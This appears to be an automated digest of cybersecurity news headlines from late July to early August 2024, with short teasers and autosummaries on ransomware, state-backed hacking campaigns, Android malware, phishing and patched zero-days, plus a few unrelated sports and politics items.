          North Korean hackers exploit VPN update flaw to install malware

          exploits
          2024-08-05 https://www.bleepingcomputer.com/news/security/north-korean-hackers-exploit-vpn-update-flaw-to-install-malware/
South Korea's National Cyber Security Center (NCSC) warns that state-backed DPRK hackers hijacked flaws in a VPN's software update to deploy malware and breach networks. [...] "

          Autosummary: When the trojanized software was installed, the malware was also deployed to capture screenshots, steal data stored in browsers (credentials, cookies, bookmarks, history), and steal GPKI certificates, SSH keys, Sticky Notes, and FileZilla data. "


          IBM Consulting Cybersecurity Assistant helps clients accelerate alert investigation

          ciber
          2024-08-05 https://www.helpnetsecurity.com/2024/08/05/ibm-consulting-cybersecurity-assistant/

IBM is adding generative AI capabilities to its managed Threat Detection and Response Services, utilized by IBM Consulting analysts to advance and streamline security operations for clients. Built on IBM’s watsonx data and AI platform, the new IBM Consulting Cybersecurity Assistant is designed to accelerate and improve the identification, investigation and response to critical security threats. In addition to being included in IBM Consulting’s threat detection and response practice, the Cybersecurity Assistant will be part of IBM … More

          The post IBM Consulting Cybersecurity Assistant helps clients accelerate alert investigation appeared first on Help Net Security.

          "

          Autosummary: Built into IBM’s TDR Services, the new capability cross-correlates alerts and enhances insights from SIEM, network, EDR, vulnerability, and telemetry to provide a holistic and integrative threat management approach. "


          Google fixes Android kernel zero-day exploited in targeted attacks

          exploits Linux
          2024-08-05 https://www.bleepingcomputer.com/news/security/google-fixes-android-kernel-zero-day-exploited-in-targeted-attacks/
          Android security updates this month patch 46 vulnerabilities, including a high-severity remote code execution (RCE) exploited in targeted attacks. [...] "

          Autosummary: Earlier this year, Google patched another zero-day exploited in attacks: a high-severity elevation of privilege (EoP) flaw in the Pixel firmware, tracked as CVE-2024-32896 by Google and CVE-2024-29748 by GrapheneOS (which found and reported the flaw). "


          Ransomware gang targets IT workers with new SharpRhino malware

          exploits
          2024-08-05 https://www.bleepingcomputer.com/news/security/hunters-international-ransomware-gang-targets-it-workers-with-new-sharprhino-malware/
          The Hunters International ransomware group is targeting IT workers with a new C# remote access trojan (RAT) called SharpRhino to breach corporate networks. [...] "

Autosummary: Two commands are hardcoded into the malware, namely "delay," to set the timer of the next POST request for retrieving a command, and "exit," to terminate its communication. "


          ‘Pig butchering’ scammers target BBC reporter

          financial
          2024-08-05 https://www.bbc.com/news/videos/ckdgdkrd2n2o
          Joe Tidy played along for over two months to learn more about how the scams work. "

          Autosummary: "


          Week in review: VMware ESXi zero-day exploited, SMS Stealer malware targeting Android users

          exploits
          2024-08-04 https://www.helpnetsecurity.com/2024/08/04/week-in-review-vmware-esxi-zero-day-exploited-sms-stealer-malware-targeting-android-users/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Why a strong patch management strategy is essential for reducing business risk In this Help Net Security interview, Eran Livne, Senior Director of Product Management, Endpoint Remediation at Qualys and Thomas Scheffler, Security Operations Manager of Cintas Corporation, discuss their experiences with automated patch management. Securing remote access to mission-critical OT assets In this Help Net Security interview, Grant Geyer, … More

          The post Week in review: VMware ESXi zero-day exploited, SMS Stealer malware targeting Android users appeared first on Help Net Security.

          "

Autosummary: Infosec products of the month: July 2024 Here’s a look at the most interesting products from the past month, featuring releases from: AttackIQ, AuditBoard, Black Kite, BlueVoyant, Druva, GitGuardian, Invicti Security, IT-Harvest, LogRhythm, LOKKER, NordVPN, Pentera, Permit.io, Prompt Security, Quantum Xchange, Regula, Rezonate, Scythe, Secure Code Warrior, and Strata Identity. New infosec products of the week: August 2, 2024 Here’s a look at the most interesting products from the past week, featuring releases from: Adaptive Shield, Fortanix, Clutch Security, Nucleus Security, Wing Security and Synack. "


          Hackers attempt to sell the personal data of 3 billion people resulting from an April data breach

          financial
          2024-08-04 https://securityaffairs.com/166539/data-breach/personal-data-3-billion-people-data-breach.html
Jerico Pictures Inc., operating as National Public Data, exposed the personal information of nearly 3 billion individuals in an April data breach. A proposed class action claims that Jerico Pictures Inc., operating as National Public Data, exposed the personal information of nearly 3 billion individuals in a data breach that occurred in April. On […] "

          Autosummary: Upon information and belief, such sensitive information includes, but is not limited to, Plaintiff’s and Class Members’ full names; current and past addresses (spanning at least the last three decades); Social Security numbers; information about parents, siblings, and other relatives (including some who have been deceased for nearly 20 years); and/or other personal information (collectively defined herein as “PII”).” "


          Security Affairs Malware Newsletter – Round 5

          exploits
          2024-08-04 https://securityaffairs.com/166535/malware/security-affairs-malware-newsletter-round-5.html
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Unplugging PlugX: Sinkholing the PlugX USB worm botnet. Introducing Gh0stGambit: A Dropper for Deploying Gh0st RAT. Mandrake spyware sneaks onto Google Play again, flying under the radar for two years. A Survey of Malware Detection Using […] "

          Autosummary: "


          Surge in Magniber ransomware attacks impact home users worldwide

          exploits ransomware
          2024-08-04 https://www.bleepingcomputer.com/news/security/surge-in-magniber-ransomware-attacks-impact-home-users-worldwide/
          [...] "

          Autosummary: Once launched, the ransomware encrypts files on the device and appends a random 5-9 character extension, like .oaxysw or .oymtk, to encrypted file names. "


          Chinese StormBamboo APT compromised ISP to deliver malware

          exploits
          2024-08-04 https://securityaffairs.com/166552/apt/stormbamboo-compromised-isp-malware.html
          A China-linked APT, tracked as StormBamboo, compromised an internet service provider (ISP) to poison software update mechanisms with malware. Volexity researchers reported that a China-linked APT group, tracked as StormBamboo (aka Evasive Panda, Daggerfly, and StormCloud), successfully compromised an undisclosed internet service provider (ISP) in order to poison DNS responses for target organizations. The threat actors targeted […] "

Autosummary: Macma is a modular backdoor that supports multiple functionalities, including device fingerprinting, executing commands, screen capture, keylogging, audio capture, uploading and downloading files. "


          Hackers Exploit Misconfigured Jupyter Notebooks with Repurposed Minecraft DDoS Tool

          exploits
          2024-08-03 https://thehackernews.com/2024/08/hackers-exploit-misconfigured-jupyter.html
          Cybersecurity researchers have disclosed details of a new distributed denial-of-service (DDoS) attack campaign targeting misconfigured Jupyter Notebooks. The activity, codenamed Panamorfi by cloud security firm Aqua, utilizes a Java-based tool called mineping to launch a TCP flood DDoS attack. Mineping is a DDoS package designed for Minecraft game servers. Attack chains entail the exploitation "

          Autosummary: "


          Russia-linked APT used a car for sale as a phishing lure to target diplomats with HeadLace malware

          financial exploits
          2024-08-03 https://securityaffairs.com/166496/apt/russia-apt-headlace-malware.html
          A Russia-linked APT used a car for sale as a phishing lure to deliver a modular Windows backdoor called HeadLace. Palo Alto researchers reported that a Russia-linked threat actor known as Fighting Ursa (also identified as APT28, Fancy Bear, or Sofacy) used a fake car advertisement to distribute HeadLace backdoor malware, targeting diplomats. The campaign began […] "

Autosummary: The three contained three files, a copy of the legitimate Windows calculator executable calc.exe that masquerades as an image file (“IMG-387470302099.jpg.exe”), a DLL (“WindowsCodecs.dll”), and a batch file (“zqtxmo.bat”). "


          Linux kernel impacted by new SLUBStick cross-cache attack

          Linux
          2024-08-03 https://www.bleepingcomputer.com/news/security/linux-kernel-impacted-by-new-slubstick-cross-cache-attack/
A novel Linux kernel cross-cache attack named SLUBStick has a 99% success rate in converting a limited heap vulnerability into an arbitrary memory read-and-write capability, letting the researchers elevate privileges or escape containers. [...] "

Autosummary: SLUBStick exploits a heap vulnerability, such as a double-free, use-after-free, or out-of-bounds write, to manipulate the memory allocation process. "


          Hackers breach ISP to poison software updates with malware

          exploits
          2024-08-03 https://www.bleepingcomputer.com/news/security/hackers-breach-isp-to-poison-software-updates-with-malware/
          A Chinese hacking group tracked as StormBamboo has compromised an undisclosed internet service provider (ISP) to poison automatic software updates with malware. [...] "

          Autosummary: "


Spies' children did not know they were Russian

          rusia-ucrania
          2024-08-03 https://www.bbc.com/news/articles/cljyj9jp993o
          The Dultsev children thought they were from Argentina and cannot speak Russian. "

          Autosummary: It was not until Thursday, during the large scale Russia-West prisoner swap, that the Kremlin spies, and their children, were returned to Russia. "


          U.S. Releases High-Profile Russian Hackers in Diplomatic Prisoner Exchange

          rusia-ucrania
          2024-08-02 https://thehackernews.com/2024/08/us-releases-high-profile-russian.html
          In a historic prisoner exchange between Belarus, Germany, Norway, Russia, Slovenia, and the U.S., two Russian nationals serving time for cybercrime activities have been freed and repatriated to their country. This includes Roman Valerevich Seleznev and Vladislav Klyushin, who are part of a group of eight people who have been swapped back to Russia in exchange for the release of 16 people who "

          Autosummary: "


          Cybercriminals Abusing Cloudflare Tunnels to Evade Detection and Spread Malware

          exploits ciber
          2024-08-02 https://thehackernews.com/2024/08/cybercriminals-abusing-cloudflare.html
Cybersecurity companies are warning about an uptick in the abuse of Cloudflare's TryCloudflare free service for malware delivery. The activity, documented by both eSentire and Proofpoint, entails the use of TryCloudflare to create a one-time tunnel that acts as a conduit to relay traffic from an attacker-controlled server to a local machine through Cloudflare's infrastructure. Attack chains "

          Autosummary: It said it "observes miscreants moving their domains, which are already listed in the DBL, to Cloudflare to disguise the backend of their operation, be it spamvertized domains, phishing, or worse." "


          Webinar: Discover the All-in-One Cybersecurity Solution for SMBs

          ciber
          2024-08-02 https://thehackernews.com/2024/08/webinar-discover-all-in-one.html
In today's digital battlefield, small and medium businesses (SMBs) face the same cyber threats as large corporations, but with fewer resources. Managed service providers (MSPs) are struggling to keep up with the demand for protection. If your current cybersecurity strategy feels like a house of cards – a complex, costly mess of different vendors and tools – it's time for a change. Introducing "

          Autosummary: Who Should Attend: Small and Medium Businesses: Get enterprise-level protection at an affordable price. "


          New Windows Backdoor BITSLOTH Exploits BITS for Stealthy Communication

          exploits
          2024-08-02 https://thehackernews.com/2024/08/new-windows-backdoor-bitsloth-exploits.html
          Cybersecurity researchers have discovered a previously undocumented Windows backdoor that leverages a built-in feature called Background Intelligent Transfer Service (BITS) as a command-and-control (C2) mechanism. The newly identified malware strain has been codenamed BITSLOTH by Elastic Security Labs, which made the discovery on June 25, 2024, in connection with a cyber attack targeting an "

          Autosummary: BITSLOTH, which takes the form of a DLL file ("flengine.dll"), is loaded by means of DLL side-loading techniques by using a legitimate executable associated with Image-Line known as FL Studio ("fl.exe"). "


          U.S. released Russian cybercriminals in diplomatic prisoner exchange

          rusia-ucrania ciber
          2024-08-02 https://securityaffairs.com/166459/uncategorized/russian-cybercriminals-diplomatic-prisoner-exchange.html
Today, 24 prisoners were released in an international swap between Russia and Western countries, including convicted Russian cybercriminals. In the recent international prisoner swap two notorious Russian cybercriminals, Roman Seleznev (40) and Vladislav Klyushin (42), are among those released. In December 2017, the Russian hacker Roman Seleznev, aka Track2, Bulba and Ncux, was sentenced to 27 years in prison; he was convicted […] "

Autosummary: Kliushin was charged alongside four other Russian citizens, Ivan Ermakov (aka Ivan Yermakov, 35), Nikolai Rumiantcev (aka Nikolay Rumyantsev, 33), Mikhail Vladimirovich Irzak (aka Mikka Irzak, 43), and Igor Sergeevich Sladkov (42). In December 2017, the Russian hacker Roman Seleznev, aka Track2, Bulba and Ncux, was sentenced to 27 years in prison; he was convicted of causing $170 million in damage by hacking into point-of-sale systems. "


          APT28 Targets Diplomats with HeadLace Malware via Car Sale Phishing Lure

          financial exploits
          2024-08-02 https://thehackernews.com/2024/08/apt28-targets-diplomats-with-headlace.html
          A Russia-linked threat actor has been linked to a new campaign that employed a car for sale as a phishing lure to deliver a modular Windows backdoor called HeadLace. "The campaign likely targeted diplomats and began as early as March 2024," Palo Alto Networks Unit 42 said in a report published today, attributing it with medium to high level of confidence to APT28, which is also referred to as "

          Autosummary: "


          Avtech camera vulnerability actively exploited in the wild, CISA warns

          exploits
          2024-08-02 https://securityaffairs.com/166471/hacking/avtech-camera-vulnerability-exploited.html
CISA warned that an Avtech camera vulnerability, which is still unpatched, is being actively exploited in the wild. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) published an advisory to warn of a vulnerability, tracked as CVE-2024-7029 (CVSS base score of 8.8), in Avtech cameras that has been exploited in the wild. An attacker can exploit […] "

          Autosummary: Pierluigi Paganini, August 02, 2024. CISA warned that an Avtech camera vulnerability, which is still unpatched, is being actively exploited in the wild. "


          Fake AI editor ads on Facebook push password-stealing malware

          exploits
          2024-08-02 https://www.bleepingcomputer.com/news/security/fake-ai-editor-ads-on-facebook-push-password-stealing-malware/
          A Facebook malvertising campaign targets users searching for AI image editing tools and steals their credentials by tricking them into installing fake apps that mimic legitimate software. [...] "

          Autosummary: After stealing their credentials, the threat actors hijack their accounts, take control of their pages, publish malicious social media posts, and promote them via paid advertising. "


          Scammers are impersonating cryptocurrency exchanges, FBI warns

          financial
          2024-08-02 https://www.malwarebytes.com/blog/news/2024/08/scammers-are-impersonating-cryptocurrency-exchanges-fbi-warns
          The FBI warns about scammers who impersonate employees of cryptocurrency exchanges as a means to defraud victims. "

          Autosummary: As scammers almost always do, they try to impose a feeling of urgency on the target, making potential victims feel as though they must act quickly because of, say, an acute problem with their account. The scammer then offers to help the target secure their funds, but to do so, the scammer—posing as a legitimate employee of the cryptocurrency exchange—first needs the victim’s login credentials. "


          Google Chrome bug breaks drag and drop from Downloads bubble

          exploits
          2024-08-02 https://www.bleepingcomputer.com/news/google/google-chrome-bug-breaks-drag-and-drop-from-downloads-bubble/
          A recent Google Chrome update has broken the drag-and-drop feature in the Downloads bubble that previously allowed you to drag and drop downloaded files onto any website or tab in the browser. [...] "

          Autosummary: "


          Football fans warned over Premier League ticket scams

          financial
          2024-08-02 https://www.bbc.com/news/articles/cm5251vgp8ro
          Thousands of young people were tricked by football ticket scams last season, Lloyds Bank estimates. "

          Autosummary: Thousands of young people in the UK were tricked into paying money for non-existent Premier League football tickets last season, according to an estimate by Lloyds Bank. "


          Ugly scenes as France edge out Argentina in quarter-final

          latam
          2024-08-02 https://www.bbc.com/sport/olympics/articles/c7282z4kjj5o
          France set up an Olympic men's football semi-final with Egypt by beating Argentina 1-0 in the quarter-finals. "

          Autosummary: "


          Nucleus Vulnerability Intelligence Platform enhances threat assessment and remediation speed

          exploits
          2024-08-01 https://www.helpnetsecurity.com/2024/08/01/nucleus-vulnerability-intelligence-platform/

          Nucleus Security has launched its Nucleus Vulnerability Intelligence Platform. The platform enables enterprises to aggregate, analyze, and act on insights from government, open-source, and premium threat intelligence feeds while reducing manual effort, accelerating threat assessment, and promoting proactive remediation. Vulnerability intelligence data is fragmented across multiple sources, from vendor security advisories to open-source projects, premium tools, and government databases, including CISA’s Known Exploited Vulnerabilities (KEV) catalog and the National Vulnerability Database (NVD). As a result, threat and … More

          The post Nucleus Vulnerability Intelligence Platform enhances threat assessment and remediation speed appeared first on Help Net Security.

          "

          Autosummary: The platform enables enterprises to aggregate, analyze, and act on insights from government, open-source, and premium threat intelligence feeds while reducing manual effort, accelerating threat assessment, and promoting proactive remediation. "


          BingoMod Android RAT steals money from victims’ bank accounts and wipes data

          financial
          2024-08-01 https://securityaffairs.com/166410/malware/bingomod-android-rat.html
          BingoMod is a new Android malware that can wipe devices after stealing money from the victims’ bank accounts. Researchers at Cleafy discovered a new Android malware, called ‘BingoMod,’ that can wipe devices after successfully stealing money from the victims’ bank accounts. The Cleafy TIR team discovered the previously undetected malware at the end of May 2024. BingoMod was […] "

          Autosummary: Once installed on the victim’s device, BingoMod leverages various permissions, including Accessibility Services, to quietly steal sensitive information, including credentials, SMS messages, and current account balances. Pierluigi Paganini, August 01, 2024. BingoMod is a new Android malware that can wipe devices after stealing money from the victims’ bank accounts. "


          Google Chrome Adds App-Bound Encryption to Protect Cookies from Malware

          exploits
          2024-08-01 https://thehackernews.com/2024/08/google-chrome-adds-app-bound-encryption.html
          Google has announced that it's adding a new layer of protection to its Chrome browser through what's called app-bound encryption to prevent information-stealing malware from grabbing cookies on Windows systems. "On Windows, Chrome uses the Data Protection API (DPAPI) which protects the data at rest from other users on the system or cold boot attacks," Will Harris from the Chrome security team "

          Autosummary: "However, the DPAPI does not protect against malicious applications able to execute code as the logged in user – which info-stealers take advantage of." App-bound encryption is an improvement over DPAPI in that it interweaves an app's identity (i.e., Chrome in this case) into encrypted data to prevent another app on the system from accessing it when decryption is attempted. "


          FBI warns of scammers posing as crypto exchange employees

          financial
          2024-08-01 https://www.bleepingcomputer.com/news/security/fbi-warns-of-scammers-posing-as-crypto-exchange-employees/
          The Federal Bureau of Investigation (FBI) warns of scammers posing as employees of cryptocurrency exchanges to steal funds from unsuspecting victims. [...] "

          Autosummary: Since the start of the year, it also warned of fake remote job ads being used to steal cryptocurrency from job seekers across the United States, and it cautioned against using unlicensed cryptocurrency transfer services, which can result in financial loss if law enforcement takes down these platforms. "


          $75 million record-breaking ransom paid to cybercriminals, say researchers

          ciber
          2024-08-01 https://www.tripwire.com/state-of-security/75-million-record-breaking-ransom-paid-cybercriminals-say-researchers
          The staggering sum of US $75 million has reportedly been paid to a ransomware gang in what is believed to be the largest known ransom payment made by a cyber attack victim since records began. Read more in my article on the Hot for Security blog. "

          Autosummary: Dark Angels, having compromised a company's security, decide whether to encrypt a business's files and then, more often than not, spend days or even weeks exfiltrating vast amounts of data. "


          New Android Banking Trojan BingoMod Steals Money, Wipes Devices

          financial exploits
          2024-08-01 https://thehackernews.com/2024/08/new-android-banking-trojan-bingomod.html
          Cybersecurity researchers have uncovered a new Android remote access trojan (RAT) called BingoMod that not only performs fraudulent money transfers from the compromised devices but also wipes them in an attempt to erase traces of the malware. Italian cybersecurity firm Cleafy, which discovered the RAT towards the end of May 2024, said the malware is under active development. It attributed the "

          Autosummary: "BingoMod belongs to the modern RAT generation of mobile malware, as its remote access capabilities allow threat actors (TAs) to conduct Account Takeover (ATO) directly from the infected device, thus exploiting the on-device fraud (ODF) technique," researchers Alessandro Strino and Simone Mattia said. "


          Hackers abuse free TryCloudflare to deliver remote access malware

          exploits
          2024-08-01 https://www.bleepingcomputer.com/news/security/hackers-abuse-free-trycloudflare-to-deliver-remote-access-malware/
          Researchers are warning of threat actors increasingly abusing the Cloudflare Tunnel service in malware campaigns that usually deliver remote access trojans (RATs). [...] "

          Autosummary: Latest campaign In a report today, cybersecurity company Proofpoint says that it observed malware activity targeting law, finance, manufacturing, and technology organizations with malicious .LNK files hosted on the legitimate TryCloudflare domain. "


          UK takes down major "Russian Coms" caller ID spoofing platform

          rusia-ucrania
          2024-08-01 https://www.bleepingcomputer.com/news/security/uk-takes-down-russian-comms-caller-id-spoofing-platform-used-to-scam-170-000-people/
          The United Kingdom's National Crime Agency (NCA) has shut down Russian Coms, a major caller ID spoofing platform used by hundreds of criminals to make over 1.8 million scam calls. [...] "

          Autosummary: Promoted through Snapchat, Instagram, and Telegram, Russian Coms was available as a handset and later as a web app that could provide customers with encrypted calls, web phone, no logs, instant handset wipes, voice changing services, international calls, and 24/7 support. "


          Tech support scam ring leader gets 7 years in prison, $6M fine

          financial
          2024-08-01 https://www.bleepingcomputer.com/news/legal/tech-support-scam-ring-leader-gets-7-years-in-prison-6m-fine/
          The leader of a tech support fraud scheme was sentenced to seven years in prison after tricking at least 6,500 victims and generating more than $6 million. [...] "

          Autosummary: Although the U.S. DoJ announcement does not specify how these pop-ups appeared on the victims’ systems, common methods used include visiting compromised websites, malvertising campaigns, phishing emails, and pre-existing infections. "


          Government shelves £1.3bn UK tech and AI plans

          government
          2024-08-01 https://www.bbc.com/news/articles/cyx5x44vnyeo
          The BBC has learned the new Labour government has shelved £1.3bn of funding for tech and AI projects. "

          Autosummary: “Exascale will help researchers model all aspects of the world, test scientific theories and improve products and services in areas such as artificial intelligence, drug discovery, climate change, astrophysics and advanced engineering,” it says on its website. "


          Cybersecurity jobs available right now: July 31, 2024

          ciber
          2024-07-31 https://www.helpnetsecurity.com/2024/07/31/cybersecurity-jobs-available-right-now-july-31-2024/

          Cloud Security Architect, Precisely | United Kingdom | Remote. As a Cloud Security Architect, you will be responsible for the design and architecture of Precisely’s cloud security posture: determining security requirements by evaluating business and product strategies, researching cloud security standards and new technologies, conducting system security and vulnerability analyses, and performing risk assessments. Cybersecurity Engineer, Electrolux Group | Italy | On-site. As a Cybersecurity Engineer, you … More

          The post Cybersecurity jobs available right now: July 31, 2024 appeared first on Help Net Security.

          "

          Autosummary: Senior Cyber Security Expert, TECNIMONT | Italy | On-site. As a Senior Cyber Security Expert, you will manage key cybersecurity solutions, including AV/EDR, SIEM, Zero Trust, Network Detection & Response, WAF, VA/PT for both infrastructure and applications, and DLP. Information Security Specialist (Cloud Security), Vertiv | Philippines | On-site. As an Information Security Specialist (Cloud Security), you will design, deploy, and manage the company's cloud-based SIEM platform, ensuring comprehensive visibility into security events, alerts, and logs across all cloud services and applications. MDDR Manager, Varonis | USA | On-site. As an MDDR Manager, you will assist in the development, documentation, analysis, testing, and modification of Varonis’ threat detection systems, playbooks, runbooks, and MDDR team operations. Junior IT and Security Compliance Specialist, Covercy | Israel | Hybrid. As a Junior IT and Security Compliance Specialist, you will manage IT infrastructure for optimal performance and security, and support network security, data protection, and system monitoring. Cyber Security Analyst, Century Aluminum | USA | On-site. As a Cyber Security Analyst, you will be responsible for monitoring, identifying, and resolving risks or vulnerabilities to safeguard Century’s information technology network, applications, and systems from external and internal cyber security threats. "


          Innovative approach promises faster bug fixes

          exploits
          2024-07-31 https://www.helpnetsecurity.com/2024/07/31/debugging-faster-bug-fixes/

          Modern software applications usually consist of numerous files and several million lines of code. Due to the sheer quantity, finding and correcting faults, known as debugging, is difficult. In many software companies, developers still search for faults manually, which takes up a large proportion of their working time. Studies indicate that this accounts for between 30 and 90 percent of the total development time. Birgit Hofer and Thomas Hirsch from the Institute of Software Technology … More

          The post Innovative approach promises faster bug fixes appeared first on Help Net Security.

          "

          Autosummary: Based on this bug report, the combination of natural language processing and metrics analyses the entire code base with respect to classes, the names of variables, files, methods or functions, and the calls to methods and functions. "


          Chinese Hackers Target Japanese Firms with LODEINFO and NOOPDOOR Malware

          exploits
          2024-07-31 https://thehackernews.com/2024/07/chinese-hackers-target-japanese-firms.html
          Japanese organizations are the target of a Chinese nation-state threat actor that leverages malware families like LODEINFO and NOOPDOOR to harvest sensitive information from compromised hosts while stealthily remaining under the radar in some cases for a time period ranging from two to three years. Israeli cybersecurity company Cybereason is tracking the campaign under the name Cuckoo Spear, "

          Autosummary: Israeli cybersecurity company Cybereason is tracking the campaign under the name Cuckoo Spear, attributing it as related to a known intrusion set dubbed APT10, which is also known as Bronze Riverside, ChessMaster, Cicada, Cloudhopper, MenuPass, MirrorFace, Purple Typhoon (formerly Potassium), and Stone Panda. "


          Cybercriminals Deploy 100K+ Malware Android Apps to Steal OTP Codes

          exploits ciber
          2024-07-31 https://thehackernews.com/2024/07/cybercriminals-deploy-100k-malware.html
          A new malicious campaign has been observed making use of malicious Android apps to steal users' SMS messages since at least February 2022 as part of a large-scale campaign. The malicious apps, spanning over 107,000 unique samples, are designed to intercept one-time passwords (OTPs) used for online account verification to commit identity fraud. "Of those 107,000 malware samples, over 99,000 of "

          Autosummary: Victims of the campaign have been detected in 113 countries, with India and Russia topping the list, followed by Brazil, Mexico, the U.S., Ukraine, Spain, and Turkey. "


          Phishing campaigns target SMBs in Poland, Romania, and Italy with multiple malware families

          financial exploits
          2024-07-31 https://securityaffairs.com/166380/cyber-crime/phishing-campaigns-target-smbs-poland.html
          Phishing campaigns target small and medium-sized businesses (SMBs) in Poland to deliver malware families such as Agent Tesla, Formbook, and Remcos RAT. ESET researchers observed multiple phishing campaigns targeting SMBs in Poland in May 2024, distributing various malware families like Agent Tesla, Formbook, and Remcos RAT. ESET researchers detected nine notable phishing campaigns during May 2024 in Poland, Romania, and Italy. […] "

          Autosummary: Pierluigi Paganini, July 31, 2024. Phishing campaigns target small and medium-sized businesses (SMBs) in Poland to deliver malware families such as Agent Tesla, Formbook, and Remcos RAT. "


          New Android malware wipes your device after draining bank accounts

          financial exploits
          2024-07-31 https://www.bleepingcomputer.com/news/security/new-android-malware-wipes-your-device-after-draining-bank-accounts/
          A new Android malware that researchers call "BingoMod" can wipe devices after successfully stealing money from the victims' bank accounts using the on-device fraud technique. [...] "

          Autosummary: Researchers at Cleafy, an online fraud management and prevention solution, found that BingoMod is distributed in smishing (SMS phishing) campaigns and uses various names that typically indicate a mobile security tool (e.g. APP Protection, Antivirus Cleanup, Chrome Update, InfoWeb, SicurezzaWeb, WebSecurity, WebsInfo, WebInfo, and APKAppScudo). "


          SMS Stealer malware targeting Android users: Over 105,000 samples identified

          exploits
          2024-07-31 https://www.helpnetsecurity.com/2024/07/31/sms-stealer-threat/

          Zimperium’s zLabs team has uncovered a new and widespread threat dubbed SMS Stealer. Detected during routine malware analysis, this malicious software has been found in over 105,000 samples, affecting more than 600 global brands. SMS Stealer’s extensive reach poses significant risks, including account takeovers and identity theft. The SMS Stealer threat, first identified in 2022, uses fake ads and Telegram bots posing as legitimate services to trick victims into granting access to their SMS messages. … More

          The post SMS Stealer malware targeting Android users: Over 105,000 samples identified appeared first on Help Net Security.

          "

          Autosummary: Once access is granted, the malware connects to one of its 13 Command and Control (C&C) servers, confirms its status, and transmits stolen SMS messages, including one-time passwords (OTPs). "


          North Korea-Linked Malware Targets Developers on Windows, Linux, and macOS

          exploits Linux
          2024-07-31 https://thehackernews.com/2024/07/north-korea-linked-malware-targets.html
          The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems. The activity cluster, dubbed DEV#POPPER and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East. "This form of attack is an "

          Autosummary: "


          OneBlood's virtual machines encrypted in ransomware attack

          exploits ransomware
          2024-07-31 https://www.bleepingcomputer.com/news/security/onebloods-virtual-machines-encrypted-in-ransomware-attack/
          OneBlood, a large not-for-profit blood center that serves hospitals and patients in the United States, is dealing with an IT systems outage caused by a ransomware attack. [...] "

          Autosummary: The organization plays a critical role in ensuring a stable blood supply to the Southeastern part of the country, collecting, testing, and distributing a large volume of blood products. "


          Google ads push fake Google Authenticator site installing malware

          exploits
          2024-07-31 https://www.bleepingcomputer.com/news/security/google-ads-push-fake-google-authenticator-site-installing-malware/
          Google has fallen victim to its own ad platform, allowing threat actors to create fake Google Authenticator ads that push the DeerStealer information-stealing malware. [...] "

          Autosummary: The sample Malwarebytes downloaded is signed by "Songyuan Meiying Electronic Products Co., Ltd." one day before the download, but ANY.RUN previously got a payload signed by "Reedcode Ltd." The valid signature gives the file credibility on Windows, potentially bypassing security solutions and allowing it to run on the victim's device without warnings. "


          World leading silver producer Fresnillo discloses cyberattack

          ciber
          2024-07-31 https://www.bleepingcomputer.com/news/security/world-leading-silver-producer-fresnillo-discloses-cyberattack/
          Fresnillo PLC, the world's largest silver producer and a top global producer of gold, copper, and zinc, said attackers gained access to data stored on its systems during a recent cyberattack. [...] "

          Autosummary: "


          A ransomware attack disrupted operations at OneBlood blood bank

          financial exploits ransomware
          2024-07-31 https://securityaffairs.com/166401/cyber-crime/oneblood-suffered-ransomware-attack.html
          OneBlood, a non-profit blood bank serving over 300 U.S. hospitals, suffered a ransomware attack that disrupted its medical operations. OneBlood is a non-profit organization that provides blood and blood products to over 300 hospitals and medical facilities across the U.S. Southeast. The organization collects, tests, and distributes blood to ensure a steady supply for needy […] "

          Autosummary: Pierluigi Paganini, July 31, 2024. OneBlood, a non-profit blood bank serving over 300 U.S. hospitals, suffered a ransomware attack that disrupted its medical operations. "


          Brazil great Marta goes off in tears after red card

          latam
          2024-07-31 https://www.bbc.com/sport/olympics/articles/cj50l9jz034o
          Brazil's all-time leading goalscorer Marta walks off the pitch in tears after being shown a straight red card during their 2-0 defeat by Spain in the Olympic women's football tournament. "

          Autosummary: "


          OneDrive Phishing Scam Tricks Users into Running Malicious PowerShell Script

          financial
          2024-07-30 https://thehackernews.com/2024/07/onedrive-phishing-scam-tricks-users.html
          Cybersecurity researchers are warning about a new phishing campaign that targets Microsoft OneDrive users with the aim of executing a malicious PowerShell script. "This campaign heavily relies on social engineering tactics to deceive users into executing a PowerShell script, thereby compromising their systems," Trellix security researcher Rafael Pena said in a Monday analysis. The cybersecurity "

          Autosummary: The campaign has been observed targeting users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K. The disclosure builds upon similar findings from ReliaQuest, Proofpoint, and McAfee Labs, indicating that phishing attacks employing this technique – also tracked as ClickFix – are becoming increasingly prevalent. "


          VMware ESXi Flaw Exploited by Ransomware Groups for Admin Access

          exploits ransomware
          2024-07-30 https://thehackernews.com/2024/07/vmware-esxi-flaw-exploited-by.html
          A recently patched security flaw impacting VMware ESXi hypervisors has been actively exploited by "several" ransomware groups to gain elevated permissions and deploy file-encrypting malware. The attacks involve the exploitation of CVE-2024-37085 (CVSS score: 6.8), an Active Directory integration authentication bypass that allows an attacker to obtain administrative access to the host. "A "

          Autosummary: "VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named 'ESX Admins' to have full administrative access by default," researchers Danielle Kuznets Nohi, Edan Zwick, Meitar Pinto, Charles-Edouard Bettan, and Vaibhav Deshmukh said. "


          Average data breach cost jumps to $4.88 million, collateral damage increased

          financial
          2024-07-30 https://www.helpnetsecurity.com/2024/07/30/ibm-cost-data-breach-report-2024/

          IBM released its annual Cost of a Data Breach Report revealing the global average cost of a data breach reached $4.88 million in 2024, as breaches grow more disruptive and further expand demands on cyber teams. Breach costs increased 10% from the prior year, the largest yearly jump since the pandemic, as 70% of breached organizations reported that the breach caused significant or very significant disruption. Lost business and post-breach customer and third-party response costs … More

          The post Average data breach cost jumps to $4.88 million, collateral damage increased appeared first on Help Net Security.

          "

          Autosummary: According to the 2024 Cost of a Data Breach Report, 40% of breaches involved data stored across multiple environments and more than one-third of breaches involved shadow data (data stored in unmanaged data sources), highlighting the growing challenge with tracking and safeguarding data. Organizations also plan to invest in incident response planning and testing, threat detection and response technologies (e.g., SIEM, SOAR and EDR), identity and access management and data security protection tools. "


          VMware ESXi auth bypass zero-day exploited by ransomware operators (CVE-2024-37085)

          exploits ransomware
          2024-07-30 https://www.helpnetsecurity.com/2024/07/30/cve-2024-37085-exploited/

